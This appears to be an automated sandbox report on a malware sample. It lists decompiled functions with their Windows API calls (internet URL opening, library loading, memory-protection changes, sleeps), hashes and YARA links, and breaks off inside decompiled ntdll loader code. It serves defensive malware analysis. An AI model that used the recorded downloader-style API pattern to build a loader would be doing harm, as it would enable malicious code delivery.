                                        Function 00564D05, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenA.WININET(005656A8,00000000,00000000,00000000,00000000,0056593C), ref: 00564D3F
                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564E4E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: E
                                        • API String ID: 2038078732-3568589458
                                        • Opcode ID: 6752688aeb0c7ff94139053d94a510da00002ec65c61c5b72c8a8b0cd9ec641e
                                        • Instruction ID: d4d4f27be2de6a9691837f9f614b72fcae304b21f3f73d3c910b1d51718de6bd
                                        • Opcode Fuzzy Hash: 6752688aeb0c7ff94139053d94a510da00002ec65c61c5b72c8a8b0cd9ec641e
                                        • Instruction Fuzzy Hash: FC410B70644786AFFB708E24CD45BED3FA4BF02340F684529AE499B1C1D7358D85DB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569F44, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: A$E
                                        • API String ID: 2994545307-1313535353
                                        • Opcode ID: aaa474f4f0259cdea0d00aaf9f878750af3ef64c2ccad3bda3336b1a81fc5d2c
                                        • Instruction ID: 21e9210a1aa4fbcfe83f49536aaf151abd2c6fe6f841d24bdeda33f41e1179fc
                                        • Opcode Fuzzy Hash: aaa474f4f0259cdea0d00aaf9f878750af3ef64c2ccad3bda3336b1a81fc5d2c
                                        • Instruction Fuzzy Hash: 96E04F80918FC82BEB61D2304D1934CAFB81B13348FBC04EEC6A94F143CA1D4C86C306
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564D48, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564E4E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: E
                                        • API String ID: 2038078732-3568589458
                                        • Opcode ID: 23bf45f9af21ea0f08e7b7ec200332a3d9359eba5968e36f5460ca834d5985c4
                                        • Instruction ID: a706029629e46dfdbfa2a19b8ea3002c8b2487f43e1d4a83ce184e2f6aece27e
                                        • Opcode Fuzzy Hash: 23bf45f9af21ea0f08e7b7ec200332a3d9359eba5968e36f5460ca834d5985c4
                                        • Instruction Fuzzy Hash: D131D4706847879FEB318E24CD45BED3FA9BF12380F6845299D8A9B1C1E7368D84DB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00566ECA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,321C9581,?,00568A55,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00567132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 2e1b756cbf7ab09b849588a49b343f91d7a25394644ae00b7c7dc172267d6edc
                                        • Instruction ID: 1bea3906ffcbc01be62e42fae1cb7c00550e58dd0639bdd9d37d94e12b7043a9
                                        • Opcode Fuzzy Hash: 2e1b756cbf7ab09b849588a49b343f91d7a25394644ae00b7c7dc172267d6edc
                                        • Instruction Fuzzy Hash: A631589080CFCC5BEF6196304D1879D6FA43B1739CFBC05EEDA964B242DB194982CB02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564D95, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 85networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564E4E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: E
                                        • API String ID: 2038078732-3568589458
                                        • Opcode ID: 11a368a177d5bf8ebf54f39c30883c05b0a8fb339632861e15360cb8af00504a
                                        • Instruction ID: 907567ccd2cdd87f364a272d9fbead3342712b3c50b35c82e3e99fc12667c731
                                        • Opcode Fuzzy Hash: 11a368a177d5bf8ebf54f39c30883c05b0a8fb339632861e15360cb8af00504a
                                        • Instruction Fuzzy Hash: CF31C370684786AFFB708E24CD45BED3FA9BF02380F584529AE495B1C1D7368D44DB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00566DEC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,321C9581,?,00568A55,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00567132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: f2ef681ab83b3312a24ac5426209604038650db9f19fdc9366389359df952582
                                        • Instruction ID: e9ad45345a00cafcd10cd61ac1587d96319fd0d9f36306370376947635735d58
                                        • Opcode Fuzzy Hash: f2ef681ab83b3312a24ac5426209604038650db9f19fdc9366389359df952582
                                        • Instruction Fuzzy Hash: 8711AA9090CB8DABEF2061209D5C7BE1E583B563ACF780A5BEC570714696194DC0DE03
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564DE2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564E4E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: E
                                        • API String ID: 2038078732-3568589458
                                        • Opcode ID: 31aaa5b12fb747042c764c306e111530830019f544e04b919d552e542eccdd7c
                                        • Instruction ID: 5f4622c9a914cc3f5c7973d589c5a71e4156b691d797233682665e7146343427
                                        • Opcode Fuzzy Hash: 31aaa5b12fb747042c764c306e111530830019f544e04b919d552e542eccdd7c
                                        • Instruction Fuzzy Hash: 1821F570684386AFFB318E24CE45BED3FA9BF02380F684529AD499B5C1E7368D44DB11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00566E20, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,321C9581,?,00568A55,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00567132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 0b7c8acd56c4847c726447381b6609428b9c7b27dcd02d6bc97e8770e69de991
                                        • Instruction ID: 66e855adbe0103eb3bf1e74b0d96451e7d1b4e706091cd0d9cd022a17a862e3d
                                        • Opcode Fuzzy Hash: 0b7c8acd56c4847c726447381b6609428b9c7b27dcd02d6bc97e8770e69de991
                                        • Instruction Fuzzy Hash: 12117B9090CB8DEBEF3061205D9C7BE6E543B1A3ACF780A5BEC974714696194DC1EE43
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564A77, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00564D00: InternetOpenA.WININET(005656A8,00000000,00000000,00000000,00000000,0056593C), ref: 00564D3F
                                          • Part of subcall function 00564D00: InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564E4E
                                        • LdrInitializeThunk.NTDLL(0056593C), ref: 00565739
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InternetOpen$InitializeThunk
                                        • String ID: E
                                        • API String ID: 518753361-3568589458
                                        • Opcode ID: 37fcce7d054a0573dfdb0ec89b93e79cd1a076f64e99534b8d5264cc5906fa2e
                                        • Instruction ID: 16daeb82a972af3b6675a5ae5fed86f72cbcbc0dcc5c8ac25d10729679b7935a
                                        • Opcode Fuzzy Hash: 37fcce7d054a0573dfdb0ec89b93e79cd1a076f64e99534b8d5264cc5906fa2e
                                        • Instruction Fuzzy Hash: 1E2102B050DBC99ADB229F70891C38A7FA4BF13354FAC45CEC8D20B093D7A58941DB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00566E8D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,321C9581,?,00568A55,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00567132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 9e0241e17bd1df3871d606c215e7cff596ab594f6e42fac1997e6a26ff8a2730
                                        • Instruction ID: 945b10b6c52b01f831851e4191dca2786271d1853a55ca50d7bd2465ae2abfc9
                                        • Opcode Fuzzy Hash: 9e0241e17bd1df3871d606c215e7cff596ab594f6e42fac1997e6a26ff8a2730
                                        • Instruction Fuzzy Hash: 5311575090CBCDABEB20A1205C5C7AD6E643B1A3ACFBC0AABED9647146861849C1DF43
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564E21, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564E4E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID: E
                                        • API String ID: 2038078732-3568589458
                                        • Opcode ID: 93b97a19435082b0fe2a661ac8e823278da2e9d02b79c16412299e9042c7ae41
                                        • Instruction ID: 07d56cb3db60ea21423d8a74f524b2f1371e43ea5d962d909e790c6abe98ca91
                                        • Opcode Fuzzy Hash: 93b97a19435082b0fe2a661ac8e823278da2e9d02b79c16412299e9042c7ae41
                                        • Instruction Fuzzy Hash: 8321C3606847CA9FFF708E24CE04BED3FA4BF02390F5841699D494B581E7368E44DB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00566F64, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,321C9581,?,00568A55,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00567132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: ae22c7f84cea88ade30ba373e5360b695a18c90a1931c32f1330d4df82ca5196
                                        • Instruction ID: e17acbffc94357f110cc5d035698abfa3eb723d7046c677151c91014d05f9d35
                                        • Opcode Fuzzy Hash: ae22c7f84cea88ade30ba373e5360b695a18c90a1931c32f1330d4df82ca5196
                                        • Instruction Fuzzy Hash: 8711E94090CFC96BEB21A5305C1979D5F646A1739CFBC06DFD9E64B542CB194982CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00566FDA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,321C9581,?,00568A55,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00567132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: c74f138a6d6902ef5822e59c416ab27208c659864461403b8d1a54147cdf1c73
                                        • Instruction ID: b599fc52c0c8d9eb9d5285b2127b117948435922d9798b6eef317f87fe06fc16
                                        • Opcode Fuzzy Hash: c74f138a6d6902ef5822e59c416ab27208c659864461403b8d1a54147cdf1c73
                                        • Instruction Fuzzy Hash: A011945050CFC95BEB62E6304C1935C6F686B1739CFBC05AED9AA4B242CB294981C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00567044, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,321C9581,?,00568A55,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00567132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 97c40d6632d0e94f9f99f3a13968977cd897a739af8d83432048ee78a7013708
                                        • Instruction ID: d07f5290f04654e6c12253f05ec98a130640051a7ae701f27321494119846a17
                                        • Opcode Fuzzy Hash: 97c40d6632d0e94f9f99f3a13968977cd897a739af8d83432048ee78a7013708
                                        • Instruction Fuzzy Hash: 46015245508FC81BEB61E624481934CAE681B13398FBC05EEDAAA4B683CB294982C746
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005670A8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,321C9581,?,00568A55,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00567132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: 5a6dcf1012b5a947e36f9d97f86b133e0f924d679851f688560689844670ddcd
                                        • Instruction ID: db89b96bdf558cc93cad2c43be7c152d2b9e6626f223b95874d8fd8b5220876b
                                        • Opcode Fuzzy Hash: 5a6dcf1012b5a947e36f9d97f86b133e0f924d679851f688560689844670ddcd
                                        • Instruction Fuzzy Hash: 9EE06544508FC86BEB61DA205C0928C6F741B1738DFBC05EFDAA64B242C7798981CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005670D9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,321C9581,?,00568A55,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00567132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: E
                                        • API String ID: 1029625771-3568589458
                                        • Opcode ID: d1a011ad5cce4927d4f50230a905ed0e7d3f5443dc1c096de12490d585e0b111
                                        • Instruction ID: 3b9ab63751ae00de2008fa04c70f7c529ad7fe1e7dae54d97ec483686b0ecda5
                                        • Opcode Fuzzy Hash: d1a011ad5cce4927d4f50230a905ed0e7d3f5443dc1c096de12490d585e0b111
                                        • Instruction Fuzzy Hash: A5E09280508FC827EB61E6348C0828C6F641B13389FBC01EFDAE64B182C7294882C341
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056483F, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNELBASE(?,80000000,?,00000000,00000003,00000000,00000000,005647A0,005648B7), ref: 00564875
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID: E
                                        • API String ID: 823142352-3568589458
                                        • Opcode ID: 1f2eaaecfc1bcc4b95e3ae5f4d4691825cf213e05d08cfa67123eac65330f4c3
                                        • Instruction ID: 07a619dcdddd3faacc7790b5f5bbb1a82d60d8f23b135b521c80bd64c751e492
                                        • Opcode Fuzzy Hash: 1f2eaaecfc1bcc4b95e3ae5f4d4691825cf213e05d08cfa67123eac65330f4c3
                                        • Instruction Fuzzy Hash: C4E0BF90928FC82BFB72D6740C19B8C6E681B13348FAC02DED6F95A5C39A594882CB15
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00569F3D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID: A
                                        • API String ID: 2994545307-390959529
                                        • Opcode ID: 2fe53c352d88c8d2e1ae658554ccf0bf637af494e13bf4198383a3f3640a108b
                                        • Instruction ID: 5ecfb3fbef1824b9a8915e7e7637e7b98d3cf62786703b637acee19107073d54
                                        • Opcode Fuzzy Hash: 2fe53c352d88c8d2e1ae658554ccf0bf637af494e13bf4198383a3f3640a108b
                                        • Instruction Fuzzy Hash: 80A0222C32C80BC00300203208E200CA82A38C03003308C3BF803CB00BCE38F08A0202
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564D00, Relevance: 3.1, APIs: 2, Instructions: 148networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenA.WININET(005656A8,00000000,00000000,00000000,00000000,0056593C), ref: 00564D3F
                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00564E4E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: InternetOpen
                                        • String ID:
                                        • API String ID: 2038078732-0
                                        • Opcode ID: 8fb555423303166c7ce2de89c601b763a798e951711c2f1bae340f4ae5a2d72a
                                        • Instruction ID: 331add49974b9c3e5968f536d1e6e101507088eb97fcb636bc52eeaa21e3773f
                                        • Opcode Fuzzy Hash: 8fb555423303166c7ce2de89c601b763a798e951711c2f1bae340f4ae5a2d72a
                                        • Instruction Fuzzy Hash: F741063074434BDFEF304E24CD55BE93BA5BF51790F548525ED4A9B1C0E7718984DA11
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005643A3, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 35sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(00000005), ref: 00564431
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: E
                                        • API String ID: 3472027048-3568589458
                                        • Opcode ID: 5db39ebef69a5edc0be47a89cc7f1bc75e78075ea376030d4a06d4a04215cd2c
                                        • Instruction ID: 06f2155aed7eb26152937aeb5781b9a1bcc984b3feb8479af1a7a943c919c066
                                        • Opcode Fuzzy Hash: 5db39ebef69a5edc0be47a89cc7f1bc75e78075ea376030d4a06d4a04215cd2c
                                        • Instruction Fuzzy Hash: CFF0A954208BC15FEB51DA3088A9B4C6FB46F03389F9D45EECA990F1E3C7298C81CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564390, Relevance: 3.0, APIs: 2, Instructions: 28sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __common_dcos_data.LIBCMT ref: 00564390
                                          • Part of subcall function 00563191: TerminateThread.KERNELBASE(000000FE,00000000), ref: 0056327D
                                        • Sleep.KERNELBASE(00000005), ref: 00564431
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: SleepTerminateThread__common_dcos_data
                                        • String ID:
                                        • API String ID: 1104745652-0
                                        • Opcode ID: a40943ef77d12092df02a40ac7fad47c1e1a6f3225373b8dc9299a5bceebda4e
                                        • Instruction ID: bbb19b2d558aa245517b6b9a73b7dd32b7b12a4a0b5fcffe1e5ec4f97a31e285
                                        • Opcode Fuzzy Hash: a40943ef77d12092df02a40ac7fad47c1e1a6f3225373b8dc9299a5bceebda4e
                                        • Instruction Fuzzy Hash: F4F0E5743443029EDB006F7080FDB992E607F42B55F6ACA6ADD450B2E2DB3084C0CD02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 005643F0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 22sleepnativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(00000005), ref: 00564431
                                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 005644CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: MemoryProtectSleepVirtual
                                        • String ID: E
                                        • API String ID: 3235210055-3568589458
                                        • Opcode ID: 1bcdaa9102fdc4f5af76d9c522525fdf5870e9e5f9352ac9f5eb6fa1460e7f74
                                        • Instruction ID: 2b99aa1a7322199be450e434f24813eef3de169b372db58a7519043bfff17734
                                        • Opcode Fuzzy Hash: 1bcdaa9102fdc4f5af76d9c522525fdf5870e9e5f9352ac9f5eb6fa1460e7f74
                                        • Instruction Fuzzy Hash: 04F08250604FC41BEB51CA30486874CAFB81B13349FAC05EECAA90F193DB594881C701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0056716B, Relevance: 1.7, APIs: 1, Instructions: 165libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,321C9581,?,00568A55,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00567132
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: 35d4b44977983b5173f6fd5c3d3a4daec0f311c6f3f053abc9d3af86ff869b32
                                        • Instruction ID: bb8c4528845e999b5f2333e5184b43e59aad1a80d388fe69551cbb7c4e81b501
                                        • Opcode Fuzzy Hash: 35d4b44977983b5173f6fd5c3d3a4daec0f311c6f3f053abc9d3af86ff869b32
                                        • Instruction Fuzzy Hash: 9A41D27460C30EDBDF149E14C9A47BA2FA0BF6D3A8F744926EC4B47241D7349D80AA52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00566DE7, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNELBASE(?,321C9581,?,00568A55,0056373A,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00567132
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        • Opcode ID: d90f407b0b7f72cde74069bdf4fbf1c70bc3fe3d45228fe3b87959f556c04db1
                                        • Instruction ID: aed47bfe904e5794a9d71036bf11f5e54f14e4ada3feaa79d1fee6787c26e052
                                        • Opcode Fuzzy Hash: d90f407b0b7f72cde74069bdf4fbf1c70bc3fe3d45228fe3b87959f556c04db1
                                        • Instruction Fuzzy Hash: 3001F5A454C30EEADE302520ADACBBB5D58BB997BCE300E13FC174314A96294DC4BD53
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00564824, Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNELBASE(?,80000000,?,00000000,00000003,00000000,00000000,005647A0,005648B7), ref: 00564875
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Offset: 00563000, based on PE: false
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 071e88b4563aaa8964ad7388022c27d7671e8d60d8a297dd159767c3a55d6731
                                        • Instruction ID: 803db8988279fbd0134bb939eb4db6b55a348e4bf715bad45e3b234174de5843
                                        • Opcode Fuzzy Hash: 071e88b4563aaa8964ad7388022c27d7671e8d60d8a297dd159767c3a55d6731
                                        • Instruction Fuzzy Hash: 5FF0E534754B056FF72588A68DF5B965642BFE6B60F34823DBB46275C4D6A048818501
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 1E3E967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.316333777.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                        • Associated: 00000001.00000002.316536328.000000001E49B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000001.00000002.316544263.000000001E49F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 54eb535eb8f520dcc7b7c2daf27c8c74a8059a2dbb81c8e4e1b86340ba26bada
                                        • Instruction ID: ee8f6295c3d00ad3366357643f49832a070fdd6ca318626694bc1ea0cc8d5a11
                                        • Opcode Fuzzy Hash: 54eb535eb8f520dcc7b7c2daf27c8c74a8059a2dbb81c8e4e1b86340ba26bada
                                        • Instruction Fuzzy Hash: 80B09B719014D5C9D611D761460C71B790177D0751F97C2A2D1120641E477CC0D1F6B6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 1E3D8E00, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 39%
                                        			E1E3D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1e49d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1e498464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1e495780 & 0x00000003) != 0) {
							E1E425510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1e495780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1E3EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1e497984; // 0x942bb0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_push("true");
							_pop(_t46);
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1e498464; // 0x74b10110
					 *0x1e49b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1E3D9B10( *((intOrPtr*)(_t48 + 0x48)));
